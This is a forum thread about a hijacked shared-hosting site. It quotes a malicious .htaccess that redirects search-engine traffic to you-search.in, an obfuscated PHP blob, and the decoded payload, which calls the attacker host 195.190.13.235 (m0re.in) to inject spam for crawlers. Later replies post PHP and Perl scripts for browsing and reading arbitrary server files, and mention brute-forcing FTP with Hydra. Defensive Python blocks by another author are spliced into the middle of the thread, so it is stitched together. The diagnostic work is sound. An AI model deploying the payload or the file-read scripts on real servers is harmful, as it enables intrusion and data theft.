View Full Version : Site Jacked
Phil Jackson
01-11-2010, 07:37 AM
Morning all, I'm trying to figure out how and who hacked my site and what the code does.
My .htaccess was altered with the following code:
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*new.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://you-search.in/in.cgi?4&parameter=ku [R,L]
and this in the index:
<?php eval(gzinflate(base64_decode('dVFda8IwFH0X/A+XEpaGldj6AXNSpg9FXybD1b1MKV2b2GBNStpOxth/X+I+3MOEhOTec8/NuSdoXTM92zHZQAh1oxtVqiPTLkoeo9VTtHrGizh+SNYmSmbzaBnjLZl0O4K7prhStYt+G3iAd0rtSoYJKA3f+F/4LS2UuogeankRK8WraUu6nfduBwBpIxbjib0bJYiHU16rbK8qJl0cjEc0GPs0GND+YIS9G99DzCztBT6BVOYw5VXbGOncA2cexdArhdyLpickrYrqLleHVMjQAQqtLpnMVM7OhjhfZ7Kc3UfOlpgi56o1UlMr9RLpHxctEWy6F1B/ozdyoermFg6+ZlRIm7DbsUMDHAtRMhdQaQbnmqX5SXzg94eEWDtoaLCTH1Oelao2T3NyilEV/vyU9pxz2wmwrFBQty8GthiqroeW8vEJ'))); ?>
and found this in a log:
Sat Dec 26 13:24:32 2009 0 71.200.60.15 154 /home/cluster-sites/26/activegardenmaintenance.co.uk/public_html/.htaccess b _ o r activegardenmaintenance.co.uk ftp 0 * c
Sat Dec 26 13:24:44 2009 2 71.200.60.15 691 /home/cluster-sites/26/activegardenmaintenance.co.uk/public_html/.htaccess b _ i r activegardenmaintenance.co.uk ftp 0 * c
Sat Dec 26 13:24:57 2009 0 71.200.60.15 7664 /home/cluster-sites/26/activegardenmaintenance.co.uk/public_html/index.html b _ o r activegardenmaintenance.co.uk ftp 0 * c
Sat Dec 26 13:25:12 2009 3 71.200.60.15 1760 /home/cluster-sites/26/activegardenmaintenance.co.uk/public_html/index.html b _ i r activegardenmaintenance.co.uk ftp 0 * c
A lookup for IP 71.200.60.15 says:
OrgName: Comcast Cable Communications, Inc.
OrgID: CMCS
Address: 1800 Bishops Gate Blvd
City: Mt Laurel
StateProv: NJ
PostalCode: 08054
Country: US
NetRange: 71.192.0.0 - 71.207.255.255
CIDR: 71.192.0.0/12
NetName: ATT-COMCAST
NetHandle: NET-71-192-0-0-1
Parent: NET-71-0-0-0-0
NetType: Direct Allocation
NameServer: DNS101.COMCAST.NET
NameServer: DNS102.COMCAST.NET
NameServer: DNS103.COMCAST.NET
Comment:
RegDate: 2005-07-27
Updated: 2008-10-31
OrgAbuseHandle: NAPO-ARIN
OrgAbuseName: Network Abuse and Policy Observance
OrgAbusePhone: +1-856-317-7272
OrgAbuseEmail:
OrgTechHandle: IC161-ARIN
OrgTechName: Comcast Cable Communications Inc
OrgTechPhone: +1-856-317-7200
OrgTechEmail:
CustName: Comcast Cable Communications, IP Services
Address: 1800 Bishops Gate Blvd.
City: Mt Laurel
StateProv: NJ
PostalCode: 08054-4628
Country: US
RegDate: 2006-04-26
Updated: 2006-04-26
NetRange: 71.200.0.0 - 71.200.127.255
CIDR: 71.200.0.0/17
NetName: DELMARVA-1
NetHandle: NET-71-200-0-0-1
Parent: NET-71-192-0-0-1
NetType: Reassigned
Comment:
RegDate: 2006-04-26
Updated: 2006-04-26
OrgAbuseHandle: NAPO-ARIN
OrgAbuseName: Network Abuse and Policy Observance
OrgAbusePhone: +1-856-317-7272
OrgAbuseEmail:
OrgTechHandle: IC161-ARIN
OrgTechName: Comcast Cable Communications Inc
OrgTechPhone: +1-856-317-7200
OrgTechEmail:
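As an added example that is not part of the thread (mine, not the poster's or the host's): the Python below embeds the altered .htaccess and the four xferlog lines from the post above and answers the two questions the post raises. It evaluates the RewriteCond chain with mod_rewrite's [OR]/[NC] semantics against constructed sample referers to show which visitors get bounced to you-search.in, and it parses the transfer log to show that the two "i" (incoming) entries are uploads that overwrote .htaccess and index.html from 71.200.60.15. The AddHandler line is also parsed, because that directive is what makes Apache run .html files through PHP. The sample referers and the trusted-IP allowlist are assumptions for the demo.

```python
import re

# The altered .htaccess exactly as quoted in the post above.
HTACCESS = """\
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*new.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://you-search.in/in.cgi?4&parameter=ku [R,L]
"""

# The four xferlog lines quoted in the post above (wu-ftpd/ProFTPD transfer log format).
XFERLOG_LINES = [
    "Sat Dec 26 13:24:32 2009 0 71.200.60.15 154 /home/cluster-sites/26/activegardenmaintenance.co.uk/public_html/.htaccess b _ o r activegardenmaintenance.co.uk ftp 0 * c",
    "Sat Dec 26 13:24:44 2009 2 71.200.60.15 691 /home/cluster-sites/26/activegardenmaintenance.co.uk/public_html/.htaccess b _ i r activegardenmaintenance.co.uk ftp 0 * c",
    "Sat Dec 26 13:24:57 2009 0 71.200.60.15 7664 /home/cluster-sites/26/activegardenmaintenance.co.uk/public_html/index.html b _ o r activegardenmaintenance.co.uk ftp 0 * c",
    "Sat Dec 26 13:25:12 2009 3 71.200.60.15 1760 /home/cluster-sites/26/activegardenmaintenance.co.uk/public_html/index.html b _ i r activegardenmaintenance.co.uk ftp 0 * c",
]

COND_RE = re.compile(r'^RewriteCond\s+%\{(\w+)\}\s+(\S+)(?:\s+\[([^\]]*)\])?$')
RULE_RE = re.compile(r'^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?$')

def parse_htaccess(text):
    """Return (conditions, redirect target, extensions handed to PHP).
    Each condition is (server variable, compiled regex, or_next)."""
    conds, target, php_exts = [], None, []
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith('AddHandler application/x-httpd-php'):
            php_exts = line.split()[2:]          # these extensions now execute as PHP
        elif (m := COND_RE.match(line)):
            var, pattern, flags = m.group(1), m.group(2), (m.group(3) or '')
            flags = {f.strip().upper() for f in flags.split(',')}
            conds.append((var, re.compile(pattern, re.I if 'NC' in flags else 0), 'OR' in flags))
        elif (m := RULE_RE.match(line)):
            target = m.group(2)
    return conds, target, php_exts

def conditions_match(conds, env):
    """mod_rewrite semantics: a run of [OR] conditions forms a group that passes if any
    member matches; the groups themselves are AND-ed together."""
    group_hit = False
    for var, pattern, or_next in conds:
        group_hit = group_hit or pattern.search(env.get(var, '')) is not None
        if not or_next:                       # last member of the group
            if not group_hit:
                return False
            group_hit = False
    return True

def redirect_for(referer, conds, target):
    """URL the visitor is bounced to, or None if the request is served normally."""
    return target if conditions_match(conds, {'HTTP_REFERER': referer}) else None

XFERLOG_RE = re.compile(
    r'^(?P<when>\w{3} \w{3} +\d+ [\d:]+ \d{4}) (?P<secs>\d+) (?P<ip>\S+) (?P<bytes>\d+) '
    r'(?P<path>\S+) (?P<type>[ab]) (?P<special>\S+) (?P<dir>[ioa]) (?P<access>[ar]) '
    r'(?P<user>\S+) (?P<service>\S+) (?P<auth>\d) (?P<authuser>\S+)(?: (?P<status>[ci]))?$')

def parse_xferlog(lines):
    """dir 'o' = outgoing (file downloaded), 'i' = incoming (file uploaded, i.e. overwritten)."""
    out = []
    for line in lines:
        m = XFERLOG_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e['bytes'] = int(e['bytes'])
            out.append(e)
    return out

def suspicious_uploads(entries, trusted_ips=(), watched=('.htaccess', 'index.html', 'index.php')):
    """Uploads of sensitive files by any IP the site owner does not recognise."""
    return [e for e in entries
            if e['dir'] == 'i' and e['ip'] not in trusted_ips
            and e['path'].rsplit('/', 1)[-1] in watched]

CONDS, TARGET, PHP_EXTS = parse_htaccess(HTACCESS)

if __name__ == '__main__':
    print('extensions now executed as PHP:', ' '.join(PHP_EXTS))
    # Constructed sample referers: two search engines, a news site (caught by the sloppy
    # ".*new.*" condition), an ordinary inbound link and a direct visit.
    for ref in ('http://images.google.com/imgres?q=garden',
                'http://www.bing.com/search?q=garden+maintenance',
                'http://www.bbc.co.uk/news/uk',
                'http://example.com/links.html', ''):
        print('%-50s -> %s' % (ref or '(direct)', redirect_for(ref, CONDS, TARGET) or 'served normally'))
    for e in suspicious_uploads(parse_xferlog(XFERLOG_LINES)):
        print('UPLOAD %s %s %d bytes by %s' % (e['when'], e['path'], e['bytes'], e['ip']))
```

Two things the output makes obvious: the site owner and direct visitors never see the redirect, which is why this kind of hijack goes unnoticed, and the ".*new.*" and ".*live.*" conditions are so loose that any referer containing those substrings (a news site, for instance) triggers it too. On the FTP side, the pattern download/upload/download/upload within 40 seconds is an attacker fetching each file, inserting the payload and putting it back.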
I would first ask who is hosting the site (shared/self) and if it's running something like Wordpress or similar?
This *may* be of help {I've not read it through}
http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/
Phil Jackson
01-11-2010, 11:30 AM
I have actually read this but it did not really give me much help. It's not using WordPress or anything like that. It's with Heart Internet (shared reseller account).
I have only the contacts script as input on the site, which is not bullet proof but is fairly safe. I can't seem to be able to convert the PHP code into something that I can understand and I don't know what the edited .htaccess would do.
And I do not know how they could edit such files with a simple email form.
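As an added example that is not part of the thread (mine, not any poster's): a small Python unpacker that statically peels `eval(gzinflate(base64_decode('...')))` wrappers like the one dropped into index.html, without executing any PHP, and then lists the network indicators in the result. PHP's gzinflate is raw DEFLATE, so the zlib call uses a negative window size. The payload it runs on here is constructed for the demo (203.0.113.7 and c2.example.invalid are reserved documentation names, not real indicators); to decode the real thing, pass the contents of the infected file to `unpack_php`.

```python
import base64
import re
import zlib

# One wrapper layer: eval(base64_decode('...')), eval(gzinflate(base64_decode('...'))) or
# eval(gzuncompress(base64_decode('...'))). Whitespace inside the base64 is tolerated because
# forum software and copy/paste often insert it.
LAYER_RE = re.compile(
    r"eval\s*\(\s*(?:(?P<decomp>gzinflate|gzuncompress)\s*\(\s*)?"
    r"base64_decode\s*\(\s*['\"](?P<b64>[A-Za-z0-9+/=\s]*)['\"]\s*\)"
    r"(?(decomp)\s*\))\s*\)\s*;?")

def decode_layer(decomp, b64):
    raw = base64.b64decode(re.sub(r'\s+', '', b64))
    if decomp == 'gzinflate':
        raw = zlib.decompress(raw, -zlib.MAX_WBITS)   # PHP gzinflate = raw DEFLATE, no zlib header
    elif decomp == 'gzuncompress':
        raw = zlib.decompress(raw)                    # PHP gzuncompress = zlib-wrapped stream
    return raw.decode('latin-1')                      # byte-preserving; PHP source is bytes

def unpack_php(src, max_layers=16):
    """Peel wrapper layers statically (nothing is executed). Returns (source, layers peeled).
    Only the eval(...) call is replaced, so surrounding HTML/PHP stays in place."""
    layers = 0
    while layers < max_layers:
        m = LAYER_RE.search(src)
        if not m:
            break
        try:
            inner = decode_layer(m.group('decomp'), m.group('b64'))
        except (ValueError, zlib.error) as exc:
            raise ValueError('layer %d is damaged or not %s data: %s'
                             % (layers + 1, m.group('decomp') or 'base64', exc))
        src = src[:m.start()] + inner + src[m.end():]
        layers += 1
    return src, layers

IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
HOST_RE = re.compile(r'Host:\s*([A-Za-z0-9.-]+)')

def indicators(src):
    """Network indicators and the cloaking tell worth pulling out of a decoded payload."""
    return {'ips': sorted(set(IPV4_RE.findall(src))),
            'hosts': sorted(set(HOST_RE.findall(src))),
            'checks_user_agent': 'HTTP_USER_AGENT' in src}

def pack_php(code, level=9):
    """Build the same wrapper a dropper would; used here only to construct the sample."""
    co = zlib.compressobj(level, zlib.DEFLATED, -zlib.MAX_WBITS)
    raw = co.compress(code.encode('latin-1')) + co.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode('ascii')

# Constructed payload in the style of a cloaking dropper; 203.0.113.7 and
# c2.example.invalid are documentation/reserved names, not real indicators.
INNER = r"""$ua = strtolower($_SERVER['HTTP_USER_AGENT']);
if (strpos($ua, 'googlebot') !== false) {
    $f = @fsockopen('203.0.113.7', 80, $errno, $errstr, 10);
    @fputs($f, "GET /in.php HTTP/1.0\r\nHost: c2.example.invalid\r\n\r\n");
}
"""
SAMPLE = '<?php ' + pack_php(pack_php(INNER)) + ' ?>'   # two nested layers

if __name__ == '__main__':
    decoded, n = unpack_php(SAMPLE)
    print('peeled %d layer(s):\n%s' % (n, decoded))
    print(indicators(decoded))
```

The loop matters because droppers often nest several layers; the static approach is preferable to the common shortcut of replacing `eval` with `echo` and running the file through the PHP CLI, which executes any code sitting outside the wrapper.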
The code unpacks/breaks down to this:
// Decoded payload, annotated. The only change to the code itself is the "$" before
// UserAgent in the strpos() calls, assumed to have been dropped in the dump above.
$UserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
// Cloaking: only visitors whose User-Agent looks like a search-engine crawler get the payload;
// ordinary browsers and the site owner see the normal page.
if(strpos($UserAgent, 'google') or strpos($UserAgent, 'yahoo') or strpos($UserAgent, 'msn') or strpos($UserAgent, 'live'))
{
$r = '';
// Fetch content from the attacker's server, reporting this site's hostname and the crawler's UA.
if($f=@fsockopen('195.190.13.235',80,$e,$er,10) and @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . "&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) . " HTTP/1.0\r\nHost: m0re.in\r\n\r\n"))
while( $l = fread($f, 1024)) $r .= $l;
@fclose($f);
// Drop the HTTP response headers and inject the body into the page served to the crawler.
$p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4);
}
And the point of interest is the IP: 195.190.13.235, which is in the Ukraine.
I'm guessing you are hosting at: 79.170.44.113. The hint at ftp in your logs in the context of index.html would suggest that index.html became some kind of shell methinks.
If you are sure it's not some kind of weak password or script of yours, perhaps an old install of an exploitable web app is to blame? If it's none of these it could be from a neighbour, but security/permissions on the server would need to be pretty weak to allow another unprivileged user into your directory, unless you've opened that up to everyone?
Some of your neighbours:
www.fashion156.com
www.elgincity.com
www.northlaine.co.uk
www.pentabus.co.uk
www.dsni.co.uk
www.encorepersonnel.co.uk
www.celtichaven.co.uk
www.base-fashions.co.uk
kirstymaccoll.com
www.sailwave.com
www.newburysound.co.uk
www.svcgroup.co.uk
www.contractflooringjournal.co.uk
www.microwaveservice.co.uk
www.beau-bellemodels.co.uk
www.knotfordnook.co.uk
www.maskreys.co.uk
www.icsheatpumps.co.uk
www.camping-birkelt.lu
www.lakedistrictfishing.net
redseadives.com
www.theperfectracingsystem.co.uk
www.sasmail.net
www.lionelsams.com
www.beverleyfestival.com
luxdesigns.com
www.durolitum.co.uk
tg-woodware.com
www.stumbles.co.uk
www.wyevalleyspa.co.uk
www.ticketbusters.co.uk
www.collinscare.co.uk
www.tenantdepositscheme.co.uk
www.coldfuel.co.uk
www.britishbiogen.co.uk
www.campion-mallorca.co.uk
www.therapeutic-shamanism.co.uk
www.porreda.com
annuitysupermarket.com
montstar.com
www.in-text.co.uk
www.blast-cleaning.co.uk
www.poshfizz.com
www.asians4asians.com
www.cheshire-furniture.co.uk
www.stamfordartisansguild.co.uk
lbug.tv
www.dnatattoo.co.uk
www.casa365.co.uk
www.gsa-ltd.co.uk
www.holmbushhouse.co.uk
www.duluxdesignservice.co.uk
www.u-tangle.co.uk
www.denims4u.co.uk
www.ashdenehouse.co.uk
www.free-pinkphone.com
www.mylocalelectrician.co.uk
insightinternet.net
www.staveleyhouse.co.uk
www.dolton.org.uk
www.whitehorse-suffolk.co.uk
www.cameronpres.co.uk
www.wealth.co.uk
athearoadrace.com
www.souschefmanchester.co.uk
www.ruffntumble.co.uk
www.weddingcarshop.com
branstonpavilion.co.uk
www.fitzalanhouse.co.uk
www.freebweb.co.uk
cc.bingj.com
www.mylocalweather.org.uk
www.statelessonline.co.uk
www.extraservices.co.uk
www.dwgraphicdesign.co.uk
www.audaciouscitychurch.com
www.heathfarmhouse.co.uk
www.stephengillplantsales.co.uk
www.keyways.co.uk
www.dream-servers.co.uk
timlewisrecruitment.com
threeleggedmusic.com
www.falklandarms.co.uk
volt-mag.com
www.monitoring-social-media.com
www.dennisbeevers.co.uk
www.j8precision.co.uk
www.cooltattooideas.net
www.acupuncture-warwickshire.co.uk
www.ayrshirecs.org
www.cosydevon.co.uk
www.huntercatapults.co.uk
www.vanleasingandsales.co.uk
www.ajwsolutions.co.uk
www.parkhoteltenby.com
scdic.org
www.eukconsulting.com
www.max-power.org.uk
www.asitdirect.co.uk
www.rowingmart.com
www.jpd-telecoms.co.uk
www.stagedmoves.com
www.dc-graphicdesigns.co.uk
www.force3hire.co.uk
www.usabcc.co.uk
www.hottubsonhire.co.uk
www.x1sportsinsurance.com
www.liveaudacious.com
www.wanobe.com
www.bodiam-ferry.co.uk
www.bad-credit-and-ccj-mortgages.co.uk
www.winterbourndownbordermorris.co.uk
www.trumpetinnledbury.co.uk
www.tom-allan.co.uk
www.culinariabristol.co.uk
www.eaovc.co.uk
www.ajwphoto.co.uk
saundersandpughe.com
www.animalrescuecharity.org.uk
www.gridlineracing.com
www.freelance-consultant.co.uk
www.brightonnaturalsolutions.co.uk
newlodgearts.com
www.markmaier.co.uk
www.passionateaboutfish.co.uk
www.cppih.org.uk
www.warrenphillipswebdesign.co.uk
www.southstaffssailingclub.co.uk
www.veterinaryexpertwitnesses.co.uk
www.sosbirminghamcouriers.co.uk
www.lasertrader.com
www.selkiestrings.co.uk
www.lyndondarkes.co.uk
www.encorecarcleaning.co.uk
www.freeiklan.biz
www.kicfm.com
www.diychaircoverhire.co.uk
www.sunshinehomes.pt
www.danceoffensive.co.uk
www.gsomusic.co.uk
kershawsgardencentre.com
www.rightyourlife.co.uk
www.knoydarthouse.co.uk
www.singleconnection.co.uk
www.scottishconservationstudio.co.uk
www.pretty-small-shoes.com
www.iansharpassociates.co.uk
www.walkingwithtigers.com
cheapholidaysabroad.net
www.greenlighthealing.co.uk
www.mobilephonespayasyougo.org
www.wasac.co.uk
www.rowantreetheatrecompany.co.uk
hypnorelate.com
www.roadsidevehicles.co.uk
springgroveclinic.com
areia.com
www.mumbaipoets.com
www.sharedlearning.org.uk
prestigeinteriorswales.co.uk
www.bristolcounselling.org.uk
www.adoptaturtle.org.uk
www.just4yougifts.co.uk
www.sostaxi.co.uk
www.clairetinsley.co.uk
www.dsouza.co.uk
whpnewbury.com
www.justgolfgifts.co.uk
www.frenchpropertyconnect.com
www.keithtilley.co.uk
www.designchic.co.uk
www.annuityrates.ltd.uk
www.hydrok.co.uk
www.taxilymington.co.uk
www.redlionatyardleyhastings.co.uk
www.kirstymaccoll.com
www.increasingblogtraffic.com
www.hhsctraining.co.uk
www.casa365.co.uk
homesmaidclean.net
www.lewisblackweb.com
www.bridgwatercommunications.co.uk
scotlandsfoodtrail.com
www.destinysoffice.com
Just for the record, you can use these simple scripts to sniff around a server and see how far you can get. Just upload and browse to them {don't forget to remove afterwards}
You'd be amazed how lame and insecure some shared hosting is. It's not a few ££ a year for nothing :-)
<?php
echo "<pre>\n";
if (ini_get('safe_mode'))
{
echo "[safe_mode enabled]\n\n";
}
else
{
echo "[safe_mode disabled]\n\n";
}
if (isset($_GET['dir']))
{
ls($_GET['dir']);
}
elseif (isset($_GET['file']))
{
cat($_GET['file']);
}
else
{
ls('/');
}
echo "</pre>\n";
function ls($dir)
{
$handle = dir($dir);
while ($filename = $handle->read())
{
$size = filesize("$dir$filename");
if (is_dir("$dir$filename"))
{
if (is_readable("$dir$filename"))
{
$line = str_pad($size, 15);
$line .= "<a href=\"{$_SERVER['PHP_SELF']}?dir=$dir$filename/\">$filename/</a>";
}
else
{
$line = str_pad($size, 15);
$line .= "$filename/";
}
}
else
{
if (is_readable("$dir$filename"))
{
$line = str_pad($size, 15);
$line .= "<a href=\"{$_SERVER['PHP_SELF']}?file=$dir$filename\">$filename</a>";
}
else
{
$line = str_pad($size, 15);
$line .= $filename;
}
}
echo "$line\n";
}
$handle->close();
}
function cat($file)
{
ob_start();
readfile($file);
$contents = ob_get_contents();
ob_clean();
echo htmlentities($contents);
return true;
}
?>
Personally I find this perl one a little better, but it needs to be put into /cgi-bin and chmodded to 755 {or it will kick out 500's}:
#!/usr/bin/perl -w
use strict;
use CGI qw(:standard);              # CGI.pm is no longer in core Perl (removed in 5.22); install from CPAN
use CGI::Carp qw(fatalsToBrowser);
use File::HomeDir;                  # CPAN module, not core
use File::Copy;
print header;
my $browsedir = "/";
my $homedir = File::HomeDir->my_home;
#get the querystring path
my $request = $ENV{'QUERY_STRING'} || '';   # empty string when there is no query, avoids uninitialised-value warnings under -w
print <<End_of_Header;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Perl File System Browser</title>
<style type="text/css" media="screen">
body {
background-color: #CCCCCC;
font: 11px verdana,arial;
}
h1 {
color: #ff0000;
font: 18px verdana,arial;
}
</style>
</head>
<body>
<h1>SPFB - Simple Perl File Browser</h1>
<p>user home directory is: $homedir</p>
End_of_Header
if ($request) {
$request =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg;
$request =~ s%p=%%g; #strip off the leading p=
$browsedir = $request;
#check if this is a file or a directory
if (-f $request) {
#if this is a zip file download it
print "REQ: $request <br>";
if ($request =~ /(\.zip|\.gz)/g) {
print "looks like a zip file - I will try to copy it to<b>$homedir</b><br>";
$_ = copy($request,$homedir) or die "Copy failed: $!";
print "copied $request to $homedir<br>" if $_;
print "</body>";
exit();
}
if (-B $request) {
print "This looks like a binary file and may cause the server to **** the bed.<br>I will copy it to your home directory <b>$homedir</b> so you can download it.<br>";
$_ = copy($request,$homedir) or die "Copy failed: $!";
print "copied $request to $homedir<br>" if $_;
print "</body>";
exit();
} else {
print "This is a file, I will attempt to open it<br>";
open (FILE, '<', $request) or die "Cannot open $request: $!";
while (<FILE>) {
chomp;
print $_ . "<br>";
}
close (FILE);
print "</body>";
exit();
}
}
}
my ($path,$urlpath,$upone,@tmp);
my @files = <$browsedir/*>;
# Link back to this script by its URL path. Under mod_cgi $0 is the script's filesystem
# path, which does not work as an href, so prefer SCRIPT_NAME and fall back to $0.
my $self = $ENV{'SCRIPT_NAME'} || $0;
print '<a href="' . $self . '">.</a><br>';
#calculate the upone value to go to
@tmp = split(/\//, defined $request ? $request : '');
#drop off the right side of the array if it has at least one element
if (@tmp) {
pop @tmp;
#combine the array into an upone path
$upone = join("/", @tmp);
#urlencode
$upone =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
}
$upone = '' unless defined $upone;
print '<a href="' . $self . '?p=' . $upone .'">..</a><br>';
#my $strip =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
#print '<a href="' . $self . '?p=' . $urlpath . '">' . $path . '</a> ';
foreach my $file (@files) {
$path = $file;
$path =~ s%\/{2}%/%g; #strip double slashes
(my $dev, my $ino, my $mode, my $nlink, my $uid, my $gid, my $rdev, my $size, my $atime, my $mtime, my $ctime, my $blksize, my $blocks) = stat $path;
$urlpath = $path;
$urlpath =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
print "F" if -f $file;
print "B" if -B $file;
print "D" if -d $file;
print "T" if -T $file;
print " ";
print "U:$uid G:$gid ";
printf "%03o", $mode&0777;
print " <$size Bytes -" . localtime($ctime) . ">";
print ' <a href="' . $self . '?p=' . $urlpath . '">' . $path . '</a> ';
print "<br>";
}
print "</body>";
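As an added example that is not part of the thread (mine, not any poster's): the file browsers above show how far you can read on a shared box, but the more useful thing for a site owner is a scanner that walks their own web root for the indicators seen in this incident: PHP tags inside .html/.htm files, the eval(gzinflate(base64_decode())) wrapper, a socket opened to a bare IPv4 literal, an .htaccess that hands non-PHP extensions to the PHP handler or prepends a file, and anything modified after a date the owner knows they were not editing. The demo web root it scans is constructed in a temporary directory; the indicator patterns are mine, drawn from the artifacts quoted in the thread, and will not catch every variant.

```python
import os
import re
import tempfile

# Indicators drawn from the artifacts in this thread.
PHP_TAG      = re.compile(r'<\?(?:php\b|=)', re.I)
EVAL_WRAPPER = re.compile(r'eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13)?\s*\(?\s*base64_decode', re.I)
SOCKET_TO_IP = re.compile(r'(?:fsockopen|curl_init|file_get_contents)\s*\(\s*["\'](?:https?://)?\d{1,3}(?:\.\d{1,3}){3}', re.I)
ADDHANDLER   = re.compile(r'^\s*AddHandler\s+application/x-httpd-php\b(.*)$', re.I | re.M)
PREPEND      = re.compile(r'^\s*php_value\s+auto_(?:prepend|append)_file\s+\S', re.I | re.M)
STATIC_EXT   = {'.html', '.htm', '.shtml', '.shtm', '.txt', '.css', '.js', '.jpg', '.png', '.gif'}

def classify(path, text):
    """Return the reasons a file looks tampered with (empty list = nothing found)."""
    name = os.path.basename(path)
    ext = os.path.splitext(name)[1].lower()
    reasons = []
    if name == '.htaccess':
        for m in ADDHANDLER.finditer(text):
            bad = [e for e in m.group(1).split() if e.lower() not in ('.php', '.phtml')]
            if bad:
                reasons.append('htaccess runs %s as PHP' % ' '.join(bad))
        if PREPEND.search(text):
            reasons.append('htaccess sets auto_prepend/append_file')
    elif ext in STATIC_EXT and PHP_TAG.search(text):
        reasons.append('PHP code inside %s file' % ext)
    if EVAL_WRAPPER.search(text):
        reasons.append('eval(base64_decode) wrapper')
    if SOCKET_TO_IP.search(text):
        reasons.append('outbound connection to a bare IP literal')
    return reasons

def scan_tree(root, baseline_ts=None):
    """Walk root and return sorted (relative path, reasons) for every file carrying an
    indicator or, when baseline_ts (epoch seconds) is given, modified after that moment."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            try:
                with open(full, 'rb') as fh:
                    text = fh.read(512 * 1024).decode('latin-1')   # byte-preserving content sniff
            except OSError:
                continue
            reasons = classify(full, text)
            if baseline_ts is not None and os.path.getmtime(full) > baseline_ts:
                reasons.append('modified after baseline')
            if reasons:
                findings.append((os.path.relpath(full, root).replace(os.sep, '/'), reasons))
    return sorted(findings)

def build_demo_tree():
    """Constructed sample web root: a clean page, a harmless contact script, an index.html
    carrying the wrapper, the altered .htaccess and a dropped backdoor under images/."""
    root = tempfile.mkdtemp(prefix='webroot-')
    def put(rel, body):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, 'w') as fh:
            fh.write(body)
    put('about.html', '<html><body>About us</body></html>\n')
    put('contact.php', "<?php mail('owner@example.invalid', 'form', $_POST['msg']); ?>\n")
    put('index.html', "<html>\n<?php eval(gzinflate(base64_decode('AAAA'))); ?>\n</html>\n")
    put('.htaccess', 'AddHandler application/x-httpd-php .html .htm\nRewriteEngine On\n')
    put('images/cache.php', "<?php $f=@fsockopen('203.0.113.7',80,$e,$s,10); ?>\n")
    return root

if __name__ == '__main__':
    root = build_demo_tree()
    for rel, reasons in scan_tree(root):
        print('%-20s %s' % (rel, '; '.join(reasons)))
```

Run it against the real document root (for example `scan_tree('/home/.../public_html', baseline_ts)` with the baseline set to the last time you legitimately edited the site) and treat every hit as a file to diff against a known-good copy, not just the two files the attacker was kind enough to leave FTP log entries for.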
Phil Jackson
01-11-2010, 05:10 PM
Wow, that's scary how deep you can get.
Phil Jackson
01-11-2010, 05:16 PM
Can this code be manipulated to find more details about my attacker?
$UserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if(strpos($UserAgent, 'google') or strpos($UserAgent, 'yahoo') or strpos($UserAgent, 'msn') or strpos($UserAgent, 'live'))
{
$r = '';
if($f=@fsockopen('195.190.13.235',80,$e,$er,10) and @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . "&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) . " HTTP/1.0\r\nHost: m0re.in\r\n\r\n"))
while( $l = fread($f, 1024)) $r .= $l;
@fclose($f);
$p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4);
}
I would not be too concerned about who your hacker is - it does not look personal, more opportunistic. My concern would be finding the 'how', shutting the door and bolting it.
Looking at some of the shared sites on that server I suspect the breach is local to you. Do you have some kind of broken/unsanitised CMS scripts that can be manipulated? Or are you offering some kind of shared hosting where customer A can manipulate the files of customer B?
Phil Jackson
01-11-2010, 05:23 PM
Nope, I have only a small email contacts form.
Thing is Phil, they got in there somehow - and they will be back if you don't find where they got in.
It can only really come down to weak ftp user/pass {it's pretty trivial to run something like Hydra against an ftp server}
Exploit on the code/scripts
Exploit on a neighbour.
It looks like it's local to you. You've not left any old exploitable junk in a directory that someone could find and use?
Personally I would scan the access and error logs looking for 404's. Particularly for web applications you don't have. Things like this would be bad:
67.228.16.196 - - [31/Oct/2009:07:36:31 +0000] "GET /myAdmin//scripts/setup.php HTTP/1.0" 404 224 "-" "-"
